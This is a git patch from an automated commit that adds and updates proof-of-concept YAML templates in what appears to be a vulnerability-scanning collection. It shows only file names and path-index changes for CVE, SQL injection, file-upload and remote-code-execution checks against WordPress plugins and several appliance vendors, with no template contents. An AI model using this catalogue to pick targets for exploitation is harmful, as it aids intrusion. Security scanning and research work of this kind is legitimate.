From eb5f6001363cdf512089154391a7330a13eb461d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 24 Aug 2024 12:35:08 +0000 Subject: [PATCH] 20240824 --- date.txt | 2 +- poc.txt | 120 ++++++++++++++++++ poc/auth/BlindSQLAuth.yaml | 66 +++++----- poc/auth/login-as-users.yaml | 59 +++++++++ .../django-debug-exposure-csrf.yaml | 18 +-- ...0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml | 59 +++++++++ ...6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml | 59 +++++++++ ...2254-fff7de08f6116735e0400b319113ddc3.yaml | 59 +++++++++ poc/cve/CVE-2024-39666.yaml | 59 +++++++++ ...4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml | 59 +++++++++ poc/cve/CVE-2024-43238.yaml | 59 +++++++++ poc/cve/CVE-2024-43239.yaml | 59 +++++++++ poc/cve/CVE-2024-43240.yaml | 59 +++++++++ poc/cve/CVE-2024-43241.yaml | 59 +++++++++ poc/cve/CVE-2024-43242.yaml | 59 +++++++++ poc/cve/CVE-2024-43244.yaml | 59 +++++++++ poc/cve/CVE-2024-43245.yaml | 59 +++++++++ poc/cve/CVE-2024-43246.yaml | 59 +++++++++ poc/cve/CVE-2024-43247.yaml | 59 +++++++++ poc/cve/CVE-2024-43248.yaml | 59 +++++++++ poc/cve/CVE-2024-43249.yaml | 59 +++++++++ poc/cve/CVE-2024-43250.yaml | 59 +++++++++ poc/cve/CVE-2024-43251.yaml | 59 +++++++++ poc/cve/CVE-2024-43252.yaml | 59 +++++++++ poc/cve/CVE-2024-43253.yaml | 59 +++++++++ poc/cve/CVE-2024-43254.yaml | 59 +++++++++ poc/cve/CVE-2024-43255.yaml | 59 +++++++++ poc/cve/CVE-2024-43256.yaml | 59 +++++++++ poc/cve/CVE-2024-43257.yaml | 59 +++++++++ poc/cve/CVE-2024-43258.yaml | 59 +++++++++ poc/cve/CVE-2024-43259.yaml | 59 +++++++++ poc/cve/CVE-2024-43260.yaml | 59 +++++++++ poc/cve/CVE-2024-43261.yaml | 59 +++++++++ poc/cve/CVE-2024-43262.yaml | 59 +++++++++ poc/cve/CVE-2024-43263.yaml | 59 +++++++++ poc/cve/CVE-2024-43264.yaml | 59 +++++++++ poc/cve/CVE-2024-43265.yaml | 59 +++++++++ poc/cve/CVE-2024-43266.yaml | 59 +++++++++ poc/cve/CVE-2024-43267.yaml | 59 +++++++++ poc/cve/CVE-2024-43268.yaml | 59 +++++++++ poc/cve/CVE-2024-43269.yaml | 59 +++++++++ poc/cve/CVE-2024-43270.yaml | 59 +++++++++ poc/cve/CVE-2024-43271.yaml | 59 +++++++++ poc/cve/CVE-2024-43272.yaml | 59 +++++++++ poc/cve/CVE-2024-43273.yaml | 59 +++++++++ poc/cve/CVE-2024-43276.yaml | 59 +++++++++ poc/cve/CVE-2024-43278.yaml | 59 +++++++++ poc/cve/CVE-2024-43279.yaml | 59 +++++++++ poc/cve/CVE-2024-43280.yaml | 59 +++++++++ poc/cve/CVE-2024-43281.yaml | 59 +++++++++ poc/cve/CVE-2024-43282.yaml | 59 +++++++++ poc/cve/CVE-2024-43283.yaml | 59 +++++++++ poc/cve/CVE-2024-43284.yaml | 59 +++++++++ poc/cve/CVE-2024-43288.yaml | 59 +++++++++ poc/cve/CVE-2024-43289.yaml | 59 +++++++++ poc/cve/CVE-2024-43292.yaml | 59 +++++++++ poc/cve/CVE-2024-43296.yaml | 59 +++++++++ poc/cve/CVE-2024-43303.yaml | 59 +++++++++ poc/cve/CVE-2024-43306.yaml | 59 +++++++++ poc/cve/CVE-2024-43307.yaml | 59 +++++++++ poc/cve/CVE-2024-43308.yaml | 59 +++++++++ poc/cve/CVE-2024-43309.yaml | 59 +++++++++ poc/cve/CVE-2024-43311.yaml | 59 +++++++++ poc/cve/CVE-2024-43313.yaml | 59 +++++++++ poc/cve/CVE-2024-43318.yaml | 59 +++++++++ poc/cve/CVE-2024-43319.yaml | 59 +++++++++ poc/cve/CVE-2024-43321.yaml | 59 +++++++++ poc/cve/CVE-2024-43322.yaml | 59 +++++++++ poc/cve/CVE-2024-43327.yaml | 59 +++++++++ poc/cve/CVE-2024-43328.yaml | 59 +++++++++ poc/cve/CVE-2024-43335.yaml | 59 +++++++++ poc/cve/CVE-2024-43342.yaml | 59 +++++++++ poc/cve/CVE-2024-43344.yaml | 59 +++++++++ poc/cve/CVE-2024-43345.yaml | 59 +++++++++ poc/cve/CVE-2024-43346.yaml | 59 +++++++++ poc/cve/CVE-2024-43348.yaml | 59 +++++++++ poc/cve/CVE-2024-43350.yaml | 59 +++++++++ poc/cve/CVE-2024-43352.yaml | 59 +++++++++ poc/cve/CVE-2024-43353.yaml | 59 +++++++++ poc/cve/CVE-2024-43354.yaml | 59 +++++++++ ...4359-739b7c6397af07930a602ed827679ba1.yaml | 59 +++++++++ poc/cve/CVE-2024-5502.yaml | 59 +++++++++ ...6493-8ce30d589b40d67eb51efe70935d8bd9.yaml | 59 +++++++++ ...6499-506582290ab27969bbad70e6796d3810.yaml | 59 +++++++++ ...6617-861b78cb0bd74ebded540a2ef2369b65.yaml | 59 +++++++++ ...6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml | 59 +++++++++ ...6665-8c1223ca753362f23c9223b5d83c7625.yaml | 59 +++++++++ ...6667-4b06082c59fafdba7199d79388d0eff6.yaml | 59 +++++++++ poc/cve/CVE-2024-7258.yaml | 59 +++++++++ ...7351-93a2178394f4d78fbcc5b86f7c46b250.yaml | 59 +++++++++ poc/cve/CVE-2024-7559.yaml | 59 +++++++++ ...7568-03c9c97fbcce1159bd078f05cbf27da7.yaml | 59 +++++++++ ...7651-7d4af77ba7202b412fee68fa25bbbec8.yaml | 59 +++++++++ ...7656-cc628b96623048172302ddea18aada71.yaml | 59 +++++++++ ...8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml | 59 +++++++++ poc/cve/cve-2001-1473.yaml | 8 +- poc/cve/cve-2008-5587.yaml | 19 ++- poc/cve/cve-2009-1151.yaml | 22 ++-- poc/cve/cve-2018-15473.yaml | 14 +- poc/cve/cve-2018-15535.yaml | 21 ++- poc/cve/cve-2020-15227.yaml | 32 +++-- ...ator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml | 59 +++++++++ ...code-08ebf57284e81768e19b2643c32c71af.yaml | 59 +++++++++ ...code-afbd01983360416a12cb28f807e89a8d.yaml | 59 +++++++++ .../yonyou-nc-cloud-jsinvoke-rce.yaml | 37 +++--- .../Hikvision_iVMS-8700_upload_action.yaml | 45 ++----- poc/other/Dahua_getUserInfoByUserName.yaml | 18 ++- poc/other/bigip.yaml | 65 ++++------ poc/other/bitformpro.yaml | 59 +++++++++ poc/other/compute-links.yaml | 59 +++++++++ ...inks-44331c84afd644601efc55a9e5863103.yaml | 59 +++++++++ ...spot-269eebf1ba30b97f68098501ab57b8df.yaml | 59 +++++++++ poc/other/display-a-meta-field-as-block.yaml | 59 +++++++++ poc/other/givingpress-lite.yaml | 59 +++++++++ poc/other/gutentor.yaml | 59 +++++++++ poc/other/hr-management.yaml | 59 +++++++++ ...sion-76fdeef266854108ceda8d0e46474378.yaml | 59 +++++++++ ...sion-7b8181a7be59fef3323111e90fb3e895.yaml | 59 +++++++++ ...cket-213e255d0f7bbab0012e0bbbd474a0f3.yaml | 59 +++++++++ ...tons-64ecf3c81675d9335f44728b57cd5ada.yaml | 59 +++++++++ poc/other/purity-of-soul.yaml | 59 +++++++++ poc/other/responsive-block-editor-addons.yaml | 59 +++++++++ ...ntor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml | 59 +++++++++ ...oard-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml | 59 +++++++++ ...ator-b6189df65fa837d8ca49f92847869143.yaml | 59 +++++++++ poc/other/visual-composer-starter.yaml | 59 +++++++++ poc/other/whmpress.yaml | 59 +++++++++ ...order-export-and-more-for-woocommerce.yaml | 59 +++++++++ .../yonyou-nc-cloud-jsinvoke-rce.yaml | 37 +++--- poc/sql/BlindSQLAuth.yaml | 66 +++++----- ...0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml | 59 +++++++++ ...6667-4b06082c59fafdba7199d79388d0eff6.yaml | 59 +++++++++ ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 30 ++--- ...cket-e74990277ea37a8d6eb0543a824bddb7.yaml | 59 +++++++++ poc/sql_injection/BlindSQLAuth.yaml | 66 +++++----- ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 30 ++--- poc/upload/Dahua_Video_FileUpload.yaml | 42 ++++-- .../Hikvision_iVMS-8700_upload_action.yaml | 45 ++----- .../Nsfocus_NF_Firewall_FileUpload.yaml | 65 +++++++--- poc/upload/Ruijie_NBR_Router_fileupload.yaml | 30 +++-- ...ecology_E-Office_Uploadify_FileUpload.yaml | 51 +++++--- .../leopard-wordpress-offload-media.yaml | 59 +++++++++ poc/wordpress/wp-travel-blocks.yaml | 59 +++++++++ poc/wordpress/wptelegram-widget.yaml | 59 +++++++++ 144 files changed, 7605 insertions(+), 424 deletions(-) create mode 100644 poc/auth/login-as-users.yaml create mode 100644 poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml create mode 100644 poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml create mode 100644 poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml create mode 100644 poc/cve/CVE-2024-39666.yaml create mode 100644 poc/cve/CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml create mode 100644 poc/cve/CVE-2024-43238.yaml create mode 100644 poc/cve/CVE-2024-43239.yaml create mode 100644 poc/cve/CVE-2024-43240.yaml create mode 100644 poc/cve/CVE-2024-43241.yaml create mode 100644 poc/cve/CVE-2024-43242.yaml create mode 100644 poc/cve/CVE-2024-43244.yaml create mode 100644 poc/cve/CVE-2024-43245.yaml create mode 100644 poc/cve/CVE-2024-43246.yaml create mode 100644 poc/cve/CVE-2024-43247.yaml create mode 100644 poc/cve/CVE-2024-43248.yaml create mode 100644 poc/cve/CVE-2024-43249.yaml create mode 100644 poc/cve/CVE-2024-43250.yaml create mode 100644 poc/cve/CVE-2024-43251.yaml create mode 100644 poc/cve/CVE-2024-43252.yaml create mode 100644 poc/cve/CVE-2024-43253.yaml create mode 100644 poc/cve/CVE-2024-43254.yaml create mode 100644 poc/cve/CVE-2024-43255.yaml create mode 100644 poc/cve/CVE-2024-43256.yaml create mode 100644 poc/cve/CVE-2024-43257.yaml create mode 100644 poc/cve/CVE-2024-43258.yaml create mode 100644 poc/cve/CVE-2024-43259.yaml create mode 100644 poc/cve/CVE-2024-43260.yaml create mode 100644 poc/cve/CVE-2024-43261.yaml create mode 100644 poc/cve/CVE-2024-43262.yaml create mode 100644 poc/cve/CVE-2024-43263.yaml create mode 100644 poc/cve/CVE-2024-43264.yaml create mode 100644 poc/cve/CVE-2024-43265.yaml create mode 100644 poc/cve/CVE-2024-43266.yaml create mode 100644 poc/cve/CVE-2024-43267.yaml create mode 100644 poc/cve/CVE-2024-43268.yaml create mode 100644 poc/cve/CVE-2024-43269.yaml create mode 100644 poc/cve/CVE-2024-43270.yaml create mode 100644 poc/cve/CVE-2024-43271.yaml create mode 100644 poc/cve/CVE-2024-43272.yaml create mode 100644 poc/cve/CVE-2024-43273.yaml create mode 100644 poc/cve/CVE-2024-43276.yaml create mode 100644 poc/cve/CVE-2024-43278.yaml create mode 100644 poc/cve/CVE-2024-43279.yaml create mode 100644 poc/cve/CVE-2024-43280.yaml create mode 100644 poc/cve/CVE-2024-43281.yaml create mode 100644 poc/cve/CVE-2024-43282.yaml create mode 100644 poc/cve/CVE-2024-43283.yaml create mode 100644 poc/cve/CVE-2024-43284.yaml create mode 100644 poc/cve/CVE-2024-43288.yaml create mode 100644 poc/cve/CVE-2024-43289.yaml create mode 100644 poc/cve/CVE-2024-43292.yaml create mode 100644 poc/cve/CVE-2024-43296.yaml create mode 100644 poc/cve/CVE-2024-43303.yaml create mode 100644 poc/cve/CVE-2024-43306.yaml create mode 100644 poc/cve/CVE-2024-43307.yaml create mode 100644 poc/cve/CVE-2024-43308.yaml create mode 100644 poc/cve/CVE-2024-43309.yaml create mode 100644 poc/cve/CVE-2024-43311.yaml create mode 100644 poc/cve/CVE-2024-43313.yaml create mode 100644 poc/cve/CVE-2024-43318.yaml create mode 100644 poc/cve/CVE-2024-43319.yaml create mode 100644 poc/cve/CVE-2024-43321.yaml create mode 100644 poc/cve/CVE-2024-43322.yaml create mode 100644 poc/cve/CVE-2024-43327.yaml create mode 100644 poc/cve/CVE-2024-43328.yaml create mode 100644 poc/cve/CVE-2024-43335.yaml create mode 100644 poc/cve/CVE-2024-43342.yaml create mode 100644 poc/cve/CVE-2024-43344.yaml create mode 100644 poc/cve/CVE-2024-43345.yaml create mode 100644 poc/cve/CVE-2024-43346.yaml create mode 100644 poc/cve/CVE-2024-43348.yaml create mode 100644 poc/cve/CVE-2024-43350.yaml create mode 100644 poc/cve/CVE-2024-43352.yaml create mode 100644 poc/cve/CVE-2024-43353.yaml create mode 100644 poc/cve/CVE-2024-43354.yaml create mode 100644 poc/cve/CVE-2024-4359-739b7c6397af07930a602ed827679ba1.yaml create mode 100644 poc/cve/CVE-2024-5502.yaml create mode 100644 poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml create mode 100644 poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml create mode 100644 poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml create mode 100644 poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml create mode 100644 poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml create mode 100644 poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml create mode 100644 poc/cve/CVE-2024-7258.yaml create mode 100644 poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml create mode 100644 poc/cve/CVE-2024-7559.yaml create mode 100644 poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml create mode 100644 poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml create mode 100644 poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml create mode 100644 poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml create mode 100644 poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml create mode 100644 poc/header/header-footer-code-08ebf57284e81768e19b2643c32c71af.yaml create mode 100644 poc/header/header-footer-code-afbd01983360416a12cb28f807e89a8d.yaml create mode 100644 poc/other/bitformpro.yaml create mode 100644 poc/other/compute-links.yaml create mode 100644 poc/other/custom-permalinks-44331c84afd644601efc55a9e5863103.yaml create mode 100644 poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml create mode 100644 poc/other/display-a-meta-field-as-block.yaml create mode 100644 poc/other/givingpress-lite.yaml create mode 100644 poc/other/gutentor.yaml create mode 100644 poc/other/hr-management.yaml create mode 100644 poc/other/imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378.yaml create mode 100644 poc/other/imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895.yaml create mode 100644 poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml create mode 100644 poc/other/maxbuttons-64ecf3c81675d9335f44728b57cd5ada.yaml create mode 100644 poc/other/purity-of-soul.yaml create mode 100644 poc/other/responsive-block-editor-addons.yaml create mode 100644 poc/other/rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml create mode 100644 poc/other/simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml create mode 100644 poc/other/string-locator-b6189df65fa837d8ca49f92847869143.yaml create mode 100644 poc/other/visual-composer-starter.yaml create mode 100644 poc/other/whmpress.yaml create mode 100644 poc/remote_code_execution/order-export-and-more-for-woocommerce.yaml create mode 100644 poc/sql/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml create mode 100644 poc/sql/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml create mode 100644 poc/sql/kbucket-e74990277ea37a8d6eb0543a824bddb7.yaml create mode 100644 poc/wordpress/leopard-wordpress-offload-media.yaml create mode 100644 poc/wordpress/wp-travel-blocks.yaml create mode 100644 poc/wordpress/wptelegram-widget.yaml diff --git a/date.txt b/date.txt index cd765ecede..8df515083d 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240823 +20240824 diff --git a/poc.txt b/poc.txt index 4b5c09733f..24f176830a 100644 --- a/poc.txt +++ b/poc.txt @@ -3664,6 +3664,7 @@ ./poc/auth/login-as-customer-or-user-plugin.yaml ./poc/auth/login-as-customer-or-user.yaml ./poc/auth/login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b.yaml +./poc/auth/login-as-users.yaml ./poc/auth/login-attempts-limit-wp-a27b928af3555fe96c9110a0c596251e.yaml ./poc/auth/login-attempts-limit-wp-a3d4d3eee498ab5be06833bab20d1678.yaml ./poc/auth/login-attempts-limit-wp.yaml @@ -23801,6 +23802,7 @@ ./poc/cve/CVE-2023-0911.yaml ./poc/cve/CVE-2023-0924-5f6349523fa3681f3fb3dddd26ea40cb.yaml ./poc/cve/CVE-2023-0924.yaml +./poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml ./poc/cve/CVE-2023-0937-710621abe5c27a3f4d488a85b84e167f.yaml ./poc/cve/CVE-2023-0937.yaml ./poc/cve/CVE-2023-0940-68c8a812a7f4d3db6d4f04bb90d0d9a4.yaml @@ -32362,6 +32364,7 @@ ./poc/cve/CVE-2023-6985.yaml ./poc/cve/CVE-2023-6986-40ce27a126a874a6f061b95c0f565f63.yaml ./poc/cve/CVE-2023-6986.yaml +./poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml ./poc/cve/CVE-2023-6988-159f07c88d3476750318c076d61454ef.yaml ./poc/cve/CVE-2023-6988.yaml ./poc/cve/CVE-2023-6989-f3e101de1aabc79baa4bde571ba04314.yaml @@ -34361,6 +34364,7 @@ ./poc/cve/CVE-2024-2253-df0681714bb2dac738636b14f0dd1322.yaml ./poc/cve/CVE-2024-2253-e80d4914f56d0bcf3f9f3038bce09c0d.yaml ./poc/cve/CVE-2024-2253.yaml +./poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml ./poc/cve/CVE-2024-2255-c91737673f0c0121f5550bad7a472ece.yaml ./poc/cve/CVE-2024-2255.yaml ./poc/cve/CVE-2024-2256-baa716bf2c82d44f12eb5944a7db627c.yaml @@ -39641,6 +39645,7 @@ ./poc/cve/CVE-2024-39665-eb86ffef2c0d7c6205176cce262c3985.yaml ./poc/cve/CVE-2024-39665.yaml ./poc/cve/CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7.yaml +./poc/cve/CVE-2024-39666.yaml ./poc/cve/CVE-2024-39668-a8fc61243890a8b4d5c1db69e4467701.yaml ./poc/cve/CVE-2024-39668.yaml ./poc/cve/CVE-2024-39678-70f27dc1298f6ae4ac79bb3c3bf23903.yaml @@ -39759,6 +39764,7 @@ ./poc/cve/CVE-2024-4095-d8fdc7f014f7dcfae7c33bd9cedc7fbf.yaml ./poc/cve/CVE-2024-4095.yaml ./poc/cve/CVE-2024-4096-9e17fda2ec5cfda56d2198b430e85695.yaml +./poc/cve/CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml ./poc/cve/CVE-2024-4096.yaml ./poc/cve/CVE-2024-4097-8ff9159d33c05e91ff51a5a3539d426a.yaml ./poc/cve/CVE-2024-4097.yaml @@ -40066,58 +40072,103 @@ ./poc/cve/CVE-2024-43236-0aa244f387067d6fa1a2f360a122d1ca.yaml ./poc/cve/CVE-2024-43236.yaml ./poc/cve/CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156.yaml +./poc/cve/CVE-2024-43238.yaml ./poc/cve/CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d.yaml +./poc/cve/CVE-2024-43239.yaml ./poc/cve/CVE-2024-4324-83e6d760adb900f9290e996e03752999.yaml ./poc/cve/CVE-2024-4324.yaml ./poc/cve/CVE-2024-43240-602dd094f3b3105ea72425933e143ccf.yaml +./poc/cve/CVE-2024-43240.yaml ./poc/cve/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml +./poc/cve/CVE-2024-43241.yaml ./poc/cve/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml +./poc/cve/CVE-2024-43242.yaml ./poc/cve/CVE-2024-43244-939e704d270328b1ff062eb9844d75b2.yaml +./poc/cve/CVE-2024-43244.yaml ./poc/cve/CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d.yaml +./poc/cve/CVE-2024-43245.yaml ./poc/cve/CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868.yaml +./poc/cve/CVE-2024-43246.yaml ./poc/cve/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml +./poc/cve/CVE-2024-43247.yaml ./poc/cve/CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa.yaml +./poc/cve/CVE-2024-43248.yaml ./poc/cve/CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec.yaml +./poc/cve/CVE-2024-43249.yaml ./poc/cve/CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb.yaml +./poc/cve/CVE-2024-43250.yaml ./poc/cve/CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4.yaml +./poc/cve/CVE-2024-43251.yaml ./poc/cve/CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691.yaml +./poc/cve/CVE-2024-43252.yaml ./poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml +./poc/cve/CVE-2024-43253.yaml ./poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml +./poc/cve/CVE-2024-43254.yaml ./poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml +./poc/cve/CVE-2024-43255.yaml ./poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml +./poc/cve/CVE-2024-43256.yaml ./poc/cve/CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1.yaml +./poc/cve/CVE-2024-43257.yaml ./poc/cve/CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42.yaml +./poc/cve/CVE-2024-43258.yaml ./poc/cve/CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6.yaml +./poc/cve/CVE-2024-43259.yaml ./poc/cve/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml +./poc/cve/CVE-2024-43260.yaml ./poc/cve/CVE-2024-43261-678706860c4e57cd059d9f119dea313a.yaml +./poc/cve/CVE-2024-43261.yaml ./poc/cve/CVE-2024-43262-1a861225d324308d9705bd093a6382ee.yaml +./poc/cve/CVE-2024-43262.yaml ./poc/cve/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml +./poc/cve/CVE-2024-43263.yaml ./poc/cve/CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4.yaml +./poc/cve/CVE-2024-43264.yaml ./poc/cve/CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592.yaml +./poc/cve/CVE-2024-43265.yaml ./poc/cve/CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7.yaml +./poc/cve/CVE-2024-43266.yaml ./poc/cve/CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16.yaml +./poc/cve/CVE-2024-43267.yaml ./poc/cve/CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe.yaml +./poc/cve/CVE-2024-43268.yaml ./poc/cve/CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6.yaml +./poc/cve/CVE-2024-43269.yaml ./poc/cve/CVE-2024-43270-00633de45e44065b1555bce09f62fb9d.yaml +./poc/cve/CVE-2024-43270.yaml ./poc/cve/CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af.yaml +./poc/cve/CVE-2024-43271.yaml ./poc/cve/CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083.yaml +./poc/cve/CVE-2024-43272.yaml ./poc/cve/CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161.yaml +./poc/cve/CVE-2024-43273.yaml ./poc/cve/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml +./poc/cve/CVE-2024-43276.yaml ./poc/cve/CVE-2024-43277-6b4940f2eac79c6e5fa7f9ba0cc0604e.yaml ./poc/cve/CVE-2024-43277.yaml ./poc/cve/CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695.yaml +./poc/cve/CVE-2024-43278.yaml ./poc/cve/CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8.yaml +./poc/cve/CVE-2024-43279.yaml ./poc/cve/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml +./poc/cve/CVE-2024-43280.yaml ./poc/cve/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml +./poc/cve/CVE-2024-43281.yaml ./poc/cve/CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16.yaml +./poc/cve/CVE-2024-43282.yaml ./poc/cve/CVE-2024-43283-48bd98c02d59c632156d003781e3c65c.yaml +./poc/cve/CVE-2024-43283.yaml ./poc/cve/CVE-2024-43284-8f3b74619f71500671f7b82070889832.yaml +./poc/cve/CVE-2024-43284.yaml ./poc/cve/CVE-2024-43285-2259cac19eda110255245b91d280697e.yaml ./poc/cve/CVE-2024-43285.yaml ./poc/cve/CVE-2024-43287-b8c9808356b0d4ca60466a01cf2f6ffc.yaml ./poc/cve/CVE-2024-43287.yaml ./poc/cve/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml +./poc/cve/CVE-2024-43288.yaml ./poc/cve/CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2.yaml +./poc/cve/CVE-2024-43289.yaml ./poc/cve/CVE-2024-4329-0b2116d78c4eba82eeda084c20215115.yaml ./poc/cve/CVE-2024-4329.yaml ./poc/cve/CVE-2024-43290-6aaddd95421bac5d3791131102bf0d20.yaml @@ -40125,6 +40176,7 @@ ./poc/cve/CVE-2024-43291-dabd8edbe180773a366911d00bf7b3d8.yaml ./poc/cve/CVE-2024-43291.yaml ./poc/cve/CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296.yaml +./poc/cve/CVE-2024-43292.yaml ./poc/cve/CVE-2024-43293-4ded08b075aff72e2714da1bf0758502.yaml ./poc/cve/CVE-2024-43293.yaml ./poc/cve/CVE-2024-43294-74cdcbe12dafdf14c55db65337423666.yaml @@ -40132,6 +40184,7 @@ ./poc/cve/CVE-2024-43295-e48e7df4f337c104fbb6960b7a073918.yaml ./poc/cve/CVE-2024-43295.yaml ./poc/cve/CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af.yaml +./poc/cve/CVE-2024-43296.yaml ./poc/cve/CVE-2024-43297-d97e1b82684ec5fda05751316b5bf585.yaml ./poc/cve/CVE-2024-43297.yaml ./poc/cve/CVE-2024-43298-6c52a4ccd32e47bf034fb72c4a4cdca9.yaml @@ -40143,20 +40196,27 @@ ./poc/cve/CVE-2024-43302-7eb579c0aaaf235ed55e89a50bb63283.yaml ./poc/cve/CVE-2024-43302.yaml ./poc/cve/CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01.yaml +./poc/cve/CVE-2024-43303.yaml ./poc/cve/CVE-2024-43304-195bc96c646d6ca6175e1ee2e543c7e0.yaml ./poc/cve/CVE-2024-43304.yaml ./poc/cve/CVE-2024-43305-1d51a608cf1e6b149a393660c5257486.yaml ./poc/cve/CVE-2024-43305.yaml ./poc/cve/CVE-2024-43306-f131b00187e803d708a0f231c364afbd.yaml +./poc/cve/CVE-2024-43306.yaml ./poc/cve/CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3.yaml +./poc/cve/CVE-2024-43307.yaml ./poc/cve/CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74.yaml +./poc/cve/CVE-2024-43308.yaml ./poc/cve/CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2.yaml +./poc/cve/CVE-2024-43309.yaml ./poc/cve/CVE-2024-43310-f45a761baa6c56237775fa475b020a07.yaml ./poc/cve/CVE-2024-43310.yaml ./poc/cve/CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9.yaml +./poc/cve/CVE-2024-43311.yaml ./poc/cve/CVE-2024-43312-a955ef755ede1aff915d714d801fd4f2.yaml ./poc/cve/CVE-2024-43312.yaml ./poc/cve/CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f.yaml +./poc/cve/CVE-2024-43313.yaml ./poc/cve/CVE-2024-43314-c4f69d44bf9c33670d3edf1035d16ec7.yaml ./poc/cve/CVE-2024-43314.yaml ./poc/cve/CVE-2024-43315-22f15f2b106abaa3fabeaf39acb88e9f.yaml @@ -40166,11 +40226,15 @@ ./poc/cve/CVE-2024-43317-011ac22d3cc6a5c25823442686fbcdc2.yaml ./poc/cve/CVE-2024-43317.yaml ./poc/cve/CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d.yaml +./poc/cve/CVE-2024-43318.yaml ./poc/cve/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml +./poc/cve/CVE-2024-43319.yaml 